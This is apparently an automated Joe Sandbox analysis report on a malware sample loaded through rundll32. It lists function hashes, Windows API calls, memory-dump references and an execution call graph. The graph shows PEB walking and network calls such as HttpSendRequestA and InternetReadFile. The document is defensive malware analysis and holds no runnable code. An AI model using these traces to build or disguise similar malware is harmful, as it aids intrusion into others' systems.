                          • Opcode ID: 9bfe1815f20eef6f12810aa6cf48fd323e4596f068184ab50fcde6092f83691d
                          • Instruction ID: 6b12ef66378260f037ec861801f5c991ca284fdd6c394fe548b8cb840b6c6b74
                          • Opcode Fuzzy Hash: 9bfe1815f20eef6f12810aa6cf48fd323e4596f068184ab50fcde6092f83691d
                          • Instruction Fuzzy Hash: F1E04F36280608F7EB112E61EC19F493AA9BF60B45F604031F90EE89D0E777E8208D84
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7EF4C377,?,?,?,7EF4BBCC,?,0000000F,?,00000000,00000208), ref: 7EF4C5A6
                          • GetProcAddress.KERNEL32(00000000), ref: 7EF4C5AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: RtlRandomEx$ntdll.dll
                          • API String ID: 1646373207-4284430886
                          • Opcode ID: f94e89ed20f696a89cd8f0c6029b3a0babcb809c71abac5e3d9ff9cb2f3ea02a
                          • Instruction ID: e8b2493d760eb37303926138ecd29be95d323fa81a1b32a413974a1ab3d452f7
                          • Opcode Fuzzy Hash: f94e89ed20f696a89cd8f0c6029b3a0babcb809c71abac5e3d9ff9cb2f3ea02a
                          • Instruction Fuzzy Hash: 94D0C776515204DF97007FE6DC58E153FACEA845453915115FC0AC5E44D7319D50DA90
                          APIs
                          • GetConsoleOutputCP.KERNEL32(1B62296B,?,00000000,?), ref: 7EF68454
                            • Part of subcall function 7EF6439D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,7EF64226,?,00000000,-00000008), ref: 7EF64449
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 7EF686AF
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 7EF686F7
                          • GetLastError.KERNEL32 ref: 7EF6879A
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: edad1313c08f74db89c2616797f793a2c2e1a7baf28cfc7214189e0a8315c15c
                          • Instruction ID: 9696675af0c087df2c8f77b0d4376e4005d6305020feb17d54d59ceeb5dcd764
                          • Opcode Fuzzy Hash: edad1313c08f74db89c2616797f793a2c2e1a7baf28cfc7214189e0a8315c15c
                          • Instruction Fuzzy Hash: 68D169B9D04298DFCB01CFA9C8A0AADBBB5FF48314F54452EE856EB741D730A942CB50
                          APIs
                            • Part of subcall function 7EF6439D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,7EF64226,?,00000000,-00000008), ref: 7EF64449
                          • GetLastError.KERNEL32 ref: 7EF64753
                          • __dosmaperr.LIBCMT ref: 7EF6475A
                          • GetLastError.KERNEL32(?,?,?,?), ref: 7EF64794
                          • __dosmaperr.LIBCMT ref: 7EF6479B
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1913693674-0
                          • Opcode ID: dc1ed871dfbf9ac26c04cc3db4f8da4cd89ec0dd3101d9be1ccc859e729ca78b
                          • Instruction ID: 503c09ad6161cfc710ea14cb991daec0f136a9bdb936564df216e3cd9d6f8cec
                          • Opcode Fuzzy Hash: dc1ed871dfbf9ac26c04cc3db4f8da4cd89ec0dd3101d9be1ccc859e729ca78b
                          • Instruction Fuzzy Hash: D321C27A604605EFD712BF66DCA091BB7FAFF42264750491AEC16DBE40D730EC408BA0
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4853ca264d99ea22a7a761542853db53d2b3b0d03bffc575eedd8ffef691bde9
                          • Instruction ID: 364ce4db3be47c059426aa091e59111fe4bc8cd7a56729d6a283cd2fd8050862
                          • Opcode Fuzzy Hash: 4853ca264d99ea22a7a761542853db53d2b3b0d03bffc575eedd8ffef691bde9
                          • Instruction Fuzzy Hash: 65219F3A204205FFD701AF66DCA4D5A77AABF60264724491AEC17D7B50EB30EC408BB0
                          APIs
                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,7EF5D839), ref: 7EF65605
                            • Part of subcall function 7EF6439D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,7EF64226,?,00000000,-00000008), ref: 7EF64449
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7EF6563D
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7EF6565D
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                          • String ID:
                          • API String ID: 158306478-0
                          • Opcode ID: ab0a959761c6060fc6122f9177811f7425307d173d382299dda7b6d209066516
                          • Instruction ID: 0c162992337fbce9fcbbdf8412155b5c2436ee8143671ff5e187d9c0320ca219
                          • Opcode Fuzzy Hash: ab0a959761c6060fc6122f9177811f7425307d173d382299dda7b6d209066516
                          • Instruction Fuzzy Hash: 2B1126BAA09605FFA31337B24CA9C6F79ACDE591993100826F806F1900FA71CE01C5B1
                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,7EF6BCF8,?,00000001,?,?,?,7EF687EE,?,?,00000000), ref: 7EF6C3F0
                          • GetLastError.KERNEL32(?,7EF6BCF8,?,00000001,?,?,?,7EF687EE,?,?,00000000,?,?,?,7EF68D75,?), ref: 7EF6C3FC
                            • Part of subcall function 7EF6C3C2: CloseHandle.KERNEL32(FFFFFFFE,7EF6C40C,?,7EF6BCF8,?,00000001,?,?,?,7EF687EE,?,?,00000000,?,?), ref: 7EF6C3D2
                          • ___initconout.LIBCMT ref: 7EF6C40C
                            • Part of subcall function 7EF6C384: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,7EF6C3B3,7EF6BCE5,?,?,7EF687EE,?,?,00000000,?), ref: 7EF6C397
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,7EF6BCF8,?,00000001,?,?,?,7EF687EE,?,?,00000000,?), ref: 7EF6C421
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: c75df84406c6babef11e4f15ca46692d4edcb63b1c74ceff9124048d0d67a260
                          • Instruction ID: 44115409f08bb911d57ec71411a3a7f409b9a045dd71904dab82395325f34332
                          • Opcode Fuzzy Hash: c75df84406c6babef11e4f15ca46692d4edcb63b1c74ceff9124048d0d67a260
                          • Instruction Fuzzy Hash: 19F0C03B540124FBCF126FA6CD19E993F76FB493A1F558452FB5A96920C63388209B90
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv
                          • String ID: +$-
                          • API String ID: 3732870572-2137968064
                          • Opcode ID: 2a5dda8db05bb586d1cdf0733098455f9d565910d00a04444795233169bd683b
                          • Instruction ID: be79179cf91c46fb51af8e1c6e10c196cb2da9ee3d87b466c6db1d17515e8895
                          • Opcode Fuzzy Hash: 2a5dda8db05bb586d1cdf0733098455f9d565910d00a04444795233169bd683b
                          • Instruction Fuzzy Hash: 39A1E239A04259DFCF01CE79C8706EE7BB1EF66624F06895AEC729BB85D234D501CB50
                          APIs
                          • std::exception::exception.LIBCONCRTD ref: 7EF23FC8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception
                          • String ID: parse error$parse_error
                          • API String ID: 2807920213-1820534363
                          • Opcode ID: 433f88c2984f81771743a93f9584c34bf02c72a8679850f823d0fe3979eff282
                          • Instruction ID: f9cbab952c291187051e9d97d82611f04d663974219d12f9f8434e02b8fa296a
                          • Opcode Fuzzy Hash: 433f88c2984f81771743a93f9584c34bf02c72a8679850f823d0fe3979eff282
                          • Instruction Fuzzy Hash: CEA116B8D05258DFDB14CF98D9A0AEEBBB5BF49300F1081AAE559AB740D7306E45CF90
                          APIs
                          • EncodePointer.KERNEL32(00000000,?), ref: 7EF511DB
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: EncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 2118026453-2084237596
                          • Opcode ID: d0179208d572197479f9bdbc22ba398a5012ea23949778039e1bc724c4dc83e5
                          • Instruction ID: 6fffc3745253c1e679eeadc9f66e5796f39369f16b9d970cd9982fbeaa7accd1
                          • Opcode Fuzzy Hash: d0179208d572197479f9bdbc22ba398a5012ea23949778039e1bc724c4dc83e5
                          • Instruction Fuzzy Hash: F241593A900A09EFCF02CF94CC90AAE7BB5BF59304F144959E916A6650D335A960DB51
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7EF07DA3
                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7EF07E6F
                            • Part of subcall function 7EF4CB02: _Yarn.LIBCPMT ref: 7EF4CB21
                            • Part of subcall function 7EF4CB02: _Yarn.LIBCPMT ref: 7EF4CB45
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                          • String ID: bad locale name
                          • API String ID: 1908188788-1405518554
                          • Opcode ID: 101fe930c5f6e16c9191cffacb47cdea9874088f6b16e870114b52b5e7d9384a
                          • Instruction ID: fd47ac480c623df95b989434fa4c196e48727cbbc33c90c23a57f94451e834eb
                          • Opcode Fuzzy Hash: 101fe930c5f6e16c9191cffacb47cdea9874088f6b16e870114b52b5e7d9384a
                          • Instruction Fuzzy Hash: CD4136B4D05289DFDB01CF98C950BAEFBF1BF49304F288199D414AB381C77A9A01CBA5

                          Execution Graph

                          Execution Coverage:6%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:15.4%
                          Total number of Nodes:1142
                          Total number of Limit Nodes:62
calls 44459->44460 44462 7faa64b7 44460->44462 44464 7fa91370 std::ios_base::clear 41 API calls 44462->44464 44463 7faa640a 44463->44456 44466 7faa6b5a 44463->44466 44465 7faa64c9 44464->44465 44470 7faa6528 44465->44470 44833 7fa819a0 44 API calls swprintf 44465->44833 44467 7fa76650 std::ios_base::clear 42 API calls 44466->44467 44469 7faa6b6e 44467->44469 44471 7fa76650 std::ios_base::clear 42 API calls 44469->44471 44470->44470 44475 7fa65450 numpunct 42 API calls 44470->44475 44472 7faa6b8f 44471->44472 44845 7fa95af0 89 API calls 4 library calls 44472->44845 44474 7faa64eb std::ios_base::clear 44834 7fa71fb0 GetPEB 44474->44834 44477 7faa65a6 44475->44477 44476 7faa6b9c 44478 7fa91370 std::ios_base::clear 41 API calls 44476->44478 44480 7fab1890 97 API calls 44477->44480 44481 7faa6bbd 44478->44481 44483 7faa65c8 44480->44483 44484 7fa91370 std::ios_base::clear 41 API calls 44481->44484 44482 7faa651b 44482->44470 44490 7faa6a91 44482->44490 44485 7fa91370 std::ios_base::clear 41 API calls 44483->44485 44487 7faa6bcc 44484->44487 44486 7faa65da 44485->44486 44488 7faa6639 44486->44488 44835 7fa7d680 44 API calls swprintf 44486->44835 44489 7fa91370 std::ios_base::clear 41 API calls 44487->44489 44494 7fa76a80 numpunct 42 API calls 44488->44494 44493 7faa6bd8 44489->44493 44492 7fa76650 std::ios_base::clear 42 API calls 44490->44492 44495 7faa6aa5 44492->44495 44496 7fa91370 std::ios_base::clear 41 API calls 44493->44496 44497 7faa664a 44494->44497 44498 7fa76650 std::ios_base::clear 42 API calls 44495->44498 44499 7faa6be4 44496->44499 44500 7fab1890 97 API calls 44497->44500 44502 7faa6ac6 44498->44502 44503 7fa92480 Concurrency::cancellation_token_source::~cancellation_token_source 83 API calls 44499->44503 44501 7faa666c 44500->44501 44504 7fa91370 std::ios_base::clear 41 API calls 44501->44504 44843 7fa95af0 89 API calls 4 library calls 44502->44843 44507 7faa6bf0 44503->44507 44508 7faa667e 44504->44508 44505 7faa65fc std::ios_base::clear 44836 7fa71fb0 
GetPEB 44505->44836 44846 7fa95ea0 84 API calls 4 library calls 44507->44846 44511 7faa66dd GetPEB 44508->44511 44837 7fa7f1a0 44 API calls swprintf 44508->44837 44509 7faa6ad3 44513 7fa91370 std::ios_base::clear 41 API calls 44509->44513 44530 7faa6727 44511->44530 44517 7faa6af4 44513->44517 44514 7faa6bfd 44518 7fa91370 std::ios_base::clear 41 API calls 44514->44518 44516 7faa662c 44516->44488 44522 7faa69b9 44516->44522 44519 7fa91370 std::ios_base::clear 41 API calls 44517->44519 44520 7faa69b1 44518->44520 44521 7faa6b03 44519->44521 44523 7fa91370 std::ios_base::clear 41 API calls 44521->44523 44526 7fa76650 std::ios_base::clear 42 API calls 44522->44526 44524 7faa6b12 44523->44524 44527 7fa91370 std::ios_base::clear 41 API calls 44524->44527 44525 7faa66a0 std::ios_base::clear 44838 7fa71fb0 GetPEB 44525->44838 44528 7faa69cd 44526->44528 44529 7faa6b1e 44527->44529 44532 7fa76650 std::ios_base::clear 42 API calls 44528->44532 44533 7fa91370 std::ios_base::clear 41 API calls 44529->44533 44537 7fa76650 std::ios_base::clear 42 API calls 44530->44537 44535 7faa69ee 44532->44535 44538 7faa6b2a 44533->44538 44534 7faa66d0 44534->44511 44534->44530 44841 7fa95af0 89 API calls 4 library calls 44535->44841 44540 7faa68e6 44537->44540 44541 7fa92480 Concurrency::cancellation_token_source::~cancellation_token_source 83 API calls 44538->44541 44539 7faa69fb 44542 7fa91370 std::ios_base::clear 41 API calls 44539->44542 44543 7fa76650 std::ios_base::clear 42 API calls 44540->44543 44544 7faa6b36 44541->44544 44545 7faa6a1c 44542->44545 44546 7faa6907 44543->44546 44844 7fa95ea0 84 API calls 4 library calls 44544->44844 44548 7fa91370 std::ios_base::clear 41 API calls 44545->44548 44839 7fa95af0 89 API calls 4 library calls 44546->44839 44551 7faa6a2b 44548->44551 44550 7faa6b43 44553 7fa91370 std::ios_base::clear 41 API calls 44550->44553 44554 7fa91370 std::ios_base::clear 41 API calls 44551->44554 44552 7faa6914 44555 7fa91370 std::ios_base::clear 41 API calls 
44552->44555 44553->44520 44556 7faa6a3a 44554->44556 44557 7faa6935 44555->44557 44558 7fa91370 std::ios_base::clear 41 API calls 44556->44558 44559 7fa91370 std::ios_base::clear 41 API calls 44557->44559 44560 7faa6a49 44558->44560 44561 7faa6944 44559->44561 44562 7fa91370 std::ios_base::clear 41 API calls 44560->44562 44563 7fa91370 std::ios_base::clear 41 API calls 44561->44563 44564 7faa6a55 44562->44564 44565 7faa6953 44563->44565 44566 7fa91370 std::ios_base::clear 41 API calls 44564->44566 44567 7fa91370 std::ios_base::clear 41 API calls 44565->44567 44568 7faa6a61 44566->44568 44569 7faa6962 44567->44569 44570 7fa92480 Concurrency::cancellation_token_source::~cancellation_token_source 83 API calls 44568->44570 44571 7fa91370 std::ios_base::clear 41 API calls 44569->44571 44573 7faa6a6d 44570->44573 44572 7faa6971 44571->44572 44575 7fa91370 std::ios_base::clear 41 API calls 44572->44575 44842 7fa95ea0 84 API calls 4 library calls 44573->44842 44577 7faa697d 44575->44577 44576 7faa6a7a 44578 7fa91370 std::ios_base::clear 41 API calls 44576->44578 44579 7fa91370 std::ios_base::clear 41 API calls 44577->44579 44578->44520 44580 7faa6989 44579->44580 44581 7fa92480 Concurrency::cancellation_token_source::~cancellation_token_source 83 API calls 44580->44581 44582 7faa6995 44581->44582 44840 7fa95ea0 84 API calls 4 library calls 44582->44840 44584 7faa69a2 44585 7fa91370 std::ios_base::clear 41 API calls 44584->44585 44585->44520 44587 7faa2216 44586->44587 44847 7fa77a50 44587->44847 44589 7faa223a 44850 7fa77ba0 44589->44850 44591 7faa2285 _Ptr_base 44592 7faa22ca 44591->44592 44593 7faa22ac 44591->44593 44857 7faa2370 83 API calls Concurrency::cancellation_token_source::~cancellation_token_source 44592->44857 44856 7faa2370 83 API calls Concurrency::cancellation_token_source::~cancellation_token_source 44593->44856 44596 7faa22c8 std::ios_base::clear 44597 7fa91370 std::ios_base::clear 41 API calls 44596->44597 44598 7faa2325 _Ptr_base 44597->44598 44599 
7fa91370 std::ios_base::clear 41 API calls 44598->44599 44600 7faa2351 44599->44600 44600->44419 44602 7faa470e 44601->44602 44921 7fa92670 44602->44921 44606 7fa649dc numpunct 44605->44606 44606->44606 44608 7fa64a21 44606->44608 44928 7fa91670 42 API calls numpunct 44606->44928 44924 7fa770a0 44608->44924 44610 7fa64a9b 44611 7fa7a110 44610->44611 44612 7fa7a12c 44611->44612 44614 7fa7a127 std::ios_base::clear 44611->44614 44613 7fa91370 std::ios_base::clear 41 API calls 44612->44613 44613->44614 44614->44443 44616 7fab18b2 _fwprintf_s 44615->44616 44930 7fa77380 44616->44930 44622 7fab18f8 44949 7fa7efb0 44622->44949 44624 7fab1922 44953 7fa7bab0 44624->44953 44626 7fab194c 44957 7fa7fb00 44626->44957 44628 7fab1976 44961 7fa83680 44628->44961 44630 7fab19a0 44965 7fa80d20 44630->44965 44632 7fab19ca 44969 7fa7d210 44632->44969 44634 7fab19f4 44973 7fa80810 44634->44973 44636 7fab1a1e 44637 7fab1a2f GetPEB 44636->44637 44638 7fab1a96 44637->44638 44977 7fa7eeb0 44638->44977 44640 7fab1ccc 44641 7fab1cdd GetPEB 44640->44641 44642 7fab1d44 44641->44642 44643 7fa77380 73 API calls 44642->44643 44644 7fab1f7a 44643->44644 44981 7fa7d3d0 44644->44981 44646 7fab1f8b 44985 7fa63ea0 44646->44985 44651 7fa63ea0 42 API calls 44652 7fab1fd3 44651->44652 44653 7fa63ea0 42 API calls 44652->44653 44654 7fab1fdc 44653->44654 44997 7fa7fcd0 44654->44997 44656 7fab1fec 44657 7fa63ea0 42 API calls 44656->44657 44658 7fab2017 44657->44658 44659 7fa63ea0 42 API calls 44658->44659 44660 7fab2020 44659->44660 45001 7fa7d740 44660->45001 44662 7fab2030 44663 7fa63ea0 42 API calls 44662->44663 44664 7fab205f 44663->44664 44665 7fa63e20 42 API calls 44664->44665 44666 7fab2068 44665->44666 44667 7fa63ea0 42 API calls 44666->44667 44668 7fab2071 44667->44668 45005 7fa83890 44668->45005 44670 7fab2081 44671 7fa63ea0 42 API calls 44670->44671 44672 7fab20bf 44671->44672 44673 7fa7a280 71 API calls 44672->44673 44674 7fab20c9 44673->44674 44675 7fa63ea0 42 API calls 44674->44675 44676 
7fab20cf 44675->44676 45009 7fa7cce0 44676->45009 44678 7fab20df 44679 7fa63ea0 42 API calls 44678->44679 44680 7fab210a 44679->44680 44681 7fa63ea0 42 API calls 44680->44681 44682 7fab2113 44681->44682 45013 7fa7e7e0 44682->45013 44684 7fab2128 45017 7fa7c1c0 44684->45017 44686 7fab2141 44687 7fa63ea0 42 API calls 44686->44687 44688 7fab2173 44687->44688 44689 7fa63ea0 42 API calls 44688->44689 44690 7fab217c 44689->44690 44691 7fa63ea0 42 API calls 44690->44691 44692 7fab2185 44691->44692 44693 7fa63e20 42 API calls 44692->44693 44694 7fab2198 44693->44694 45021 7faba420 44694->45021 44697 7fab2257 44698 7fab2594 std::ios_base::clear 44697->44698 44700 7fab24a6 44697->44700 44699 7fab25ce GetPEB 44698->44699 44706 7fab2672 44699->44706 44700->44700 44701 7fa65450 numpunct 42 API calls 44700->44701 44702 7fab2539 44701->44702 44703 7fa91370 std::ios_base::clear 41 API calls 44702->44703 44704 7fab2555 44703->44704 45027 7fa795d0 41 API calls 44704->45027 44708 7fab2c1b std::ios_base::clear 44706->44708 44709 7fab28df GetPEB 44706->44709 44707 7fab2564 45028 7fa795d0 41 API calls 44707->45028 44711 7fab2c6f GetPEB 44708->44711 44713 7fab291f 44709->44713 44712 7fab2d13 44711->44712 44714 7fab2f7d GetPEB 44712->44714 44717 7fab3529 44712->44717 44715 7fa65450 numpunct 42 API calls 44713->44715 44723 7fab2fbc GetPEB 44714->44723 44716 7fab2bc0 44715->44716 44718 7fa91370 std::ios_base::clear 41 API calls 44716->44718 44717->44717 44720 7fa65450 numpunct 42 API calls 44717->44720 44719 7fab2bdc 44718->44719 45029 7fa795d0 41 API calls 44719->45029 44725 7fab35b2 std::ios_base::clear 44720->44725 44722 7fab2beb 45030 7fa795d0 41 API calls 44722->45030 44731 7fab321b 44723->44731 44727 7fab360b GetPEB 44725->44727 44732 7fab368d HttpSendRequestA 44727->44732 44728 7fab2581 std::ios_base::_Ios_base_dtor 44728->44451 44730 7fab38e4 GetPEB 44737 7fab3924 GetPEB 44730->44737 44733 7fa65450 numpunct 42 API calls 44731->44733 44732->44730 44745 7fab40bc 44732->44745 44734 
7fab34ce 44733->44734 44736 7fa91370 std::ios_base::clear 41 API calls 44734->44736 44735 7fab40f2 GetPEB 44735->44745 44738 7fab34ea 44736->44738 44749 7fab3b72 GetPEB 44737->44749 45031 7fa795d0 41 API calls 44738->45031 44741 7fab34f9 45032 7fa795d0 41 API calls 44741->45032 44742 7fab437d InternetReadFile 44743 7fab43df 44742->44743 44742->44745 44746 7fab4c18 GetPEB 44743->44746 44747 7fab43ec GetPEB 44743->44747 44745->44735 44745->44742 44745->44743 45035 7fa92280 42 API calls std::ios_base::clear 44745->45035 44754 7fab4c58 InternetCloseHandle GetPEB 44746->44754 44752 7fab442c GetPEB 44747->44752 44758 7fab3dc0 44749->44758 44755 7fab468c GetPEB 44752->44755 44756 7fab4eb8 GetPEB 44754->44756 44775 7fab48ec 44755->44775 44768 7fab5118 44756->44768 44760 7fa65450 numpunct 42 API calls 44758->44760 44761 7fab4052 44760->44761 44762 7fa91370 std::ios_base::clear 41 API calls 44761->44762 44763 7fab406e 44762->44763 44764 7fa91370 std::ios_base::clear 41 API calls 44763->44764 44765 7fab407d 44764->44765 45033 7fa795d0 41 API calls 44765->45033 44767 7fab408c 45034 7fa795d0 41 API calls 44767->45034 44769 7fab535d 44768->44769 44774 7fab53fd std::ios_base::clear 44768->44774 45038 7fa76850 42 API calls numpunct 44769->45038 44772 7fab537f 44773 7fa91370 std::ios_base::clear 41 API calls 44772->44773 44776 7fab53a0 44773->44776 44779 7fa91370 std::ios_base::clear 41 API calls 44774->44779 44777 7fa65450 numpunct 42 API calls 44775->44777 44778 7fa91370 std::ios_base::clear 41 API calls 44776->44778 44780 7fab4b9f 44777->44780 44781 7fab53af 44778->44781 44782 7fab545f 44779->44782 44783 7fa91370 std::ios_base::clear 41 API calls 44780->44783 44784 7fa91370 std::ios_base::clear 41 API calls 44781->44784 44785 7fa91370 std::ios_base::clear 41 API calls 44782->44785 44786 7fab4bbb 44783->44786 44787 7fab53be 44784->44787 44788 7fab546e 44785->44788 44789 7fa91370 std::ios_base::clear 41 API calls 44786->44789 45039 7fa795d0 41 API calls 44787->45039 44791 7fa91370 
std::ios_base::clear 41 API calls 44788->44791 44792 7fab4bca 44789->44792 44794 7fab547d 44791->44794 44795 7fa91370 std::ios_base::clear 41 API calls 44792->44795 44793 7fab53cd 45040 7fa795d0 41 API calls 44793->45040 45041 7fa795d0 41 API calls 44794->45041 44797 7fab4bd9 44795->44797 45036 7fa795d0 41 API calls 44797->45036 44799 7fab548c std::ios_base::_Ios_base_dtor 45042 7fa795d0 41 API calls 44799->45042 44800 7fab4be8 45037 7fa795d0 41 API calls 44800->45037 44804->44425 44806 7fa6d4cd 44805->44806 45175 7fa6d370 44806->45175 44808 7fa6d4f0 std::ios_base::clear 44809 7fa91370 std::ios_base::clear 41 API calls 44808->44809 44810 7fa6d517 44809->44810 44811 7fa94160 44810->44811 44812 7fa76650 std::ios_base::clear 42 API calls 44811->44812 44813 7fa941b9 44812->44813 45198 7faafad0 44813->45198 44816 7fa76650 std::ios_base::clear 42 API calls 44817 7fa941d6 44816->44817 45202 7fab5530 44817->45202 44820 7fa91370 std::ios_base::clear 41 API calls 44821 7fa941fa 44820->44821 44822 7fa91370 std::ios_base::clear 41 API calls 44821->44822 44823 7fa94209 44822->44823 44823->44430 45208 7fa75820 44824->45208 44827 7fa92480 Concurrency::cancellation_token_source::~cancellation_token_source 83 API calls 44828 7fa631af 44827->44828 44828->44441 44829->44448 44830->44452 44831->44458 44832->44463 44833->44474 44834->44482 44835->44505 44836->44516 44837->44525 44838->44534 44839->44552 44840->44584 44841->44539 44842->44576 44843->44509 44844->44550 44845->44476 44846->44514 44858 7fa723a0 44847->44858 44849 7fa77a6d _Ptr_base 44849->44589 44851 7fa77c27 _memcpy_s 44850->44851 44861 7facb85c 44851->44861 44853 7fa77c2f _memcpy_s 44866 7fa769f0 44853->44866 44855 7fa77cc5 _Ptr_base 44855->44591 44856->44596 44857->44596 44859 7fabd43b std::_Facet_Register 3 API calls 44858->44859 44860 7fa723b4 _Ptr_base 44859->44860 44860->44849 44869 7faceb5c GetLastError 44861->44869 44913 7fa65680 44866->44913 44868 7fa76a5c 44868->44855 44870 7faceb78 44869->44870 44871 7faceb72 
44869->44871 44875 7faceb7c 44870->44875 44903 7fad0fda 6 API calls std::_Lockit::_Lockit 44870->44903 44902 7fad0f9b 6 API calls std::_Lockit::_Lockit 44871->44902 44874 7faceb94 44874->44875 44876 7faceb9c 44874->44876 44878 7facec01 SetLastError 44875->44878 44904 7fad07fe 14 API calls 3 library calls 44876->44904 44880 7facb867 44878->44880 44881 7facec11 44878->44881 44879 7faceba9 44882 7facebb1 44879->44882 44883 7facebc2 44879->44883 44898 7fad09c9 44880->44898 44911 7facca21 41 API calls std::locale::_Setgloballocale 44881->44911 44905 7fad0fda 6 API calls std::_Lockit::_Lockit 44882->44905 44906 7fad0fda 6 API calls std::_Lockit::_Lockit 44883->44906 44888 7facebbf 44908 7fad085b 14 API calls __dosmaperr 44888->44908 44889 7facebce 44890 7facebe9 44889->44890 44891 7facebd2 44889->44891 44909 7face95e 14 API calls __Getctype 44890->44909 44907 7fad0fda 6 API calls std::_Lockit::_Lockit 44891->44907 44895 7facebf4 44910 7fad085b 14 API calls __dosmaperr 44895->44910 44896 7facebe6 44896->44878 44899 7fad09dc 44898->44899 44900 7facb877 44898->44900 44899->44900 44912 7fad5ae0 41 API calls 4 library calls 44899->44912 44900->44853 44902->44870 44903->44874 44904->44879 44905->44888 44906->44889 44907->44888 44908->44896 44909->44895 44910->44896 44912->44900 44914 7fa65697 numpunct 44913->44914 44916 7fa656a1 numpunct 44914->44916 44919 7fa91670 42 API calls numpunct 44914->44919 44918 7fa656ba _memcpy_s 44916->44918 44920 7fa64ae0 42 API calls 2 library calls 44916->44920 44918->44868 44919->44916 44920->44918 44922 7fa916a0 3 API calls 44921->44922 44923 7fa926c9 44922->44923 44923->44427 44925 7fa771c9 ctype 44924->44925 44926 7fa77136 numpunct 44924->44926 44925->44610 44929 7fa64ae0 42 API calls 2 library calls 44926->44929 44928->44608 44929->44925 44931 7fa773ab 44930->44931 45043 7fa75e00 44931->45043 44936 7fa7a280 45140 7fa78d50 44936->45140 44939 7fa93640 std::ios_base::clear 42 API calls 44941 7fa7a462 44939->44941 45144 7fa79ef0 44941->45144 
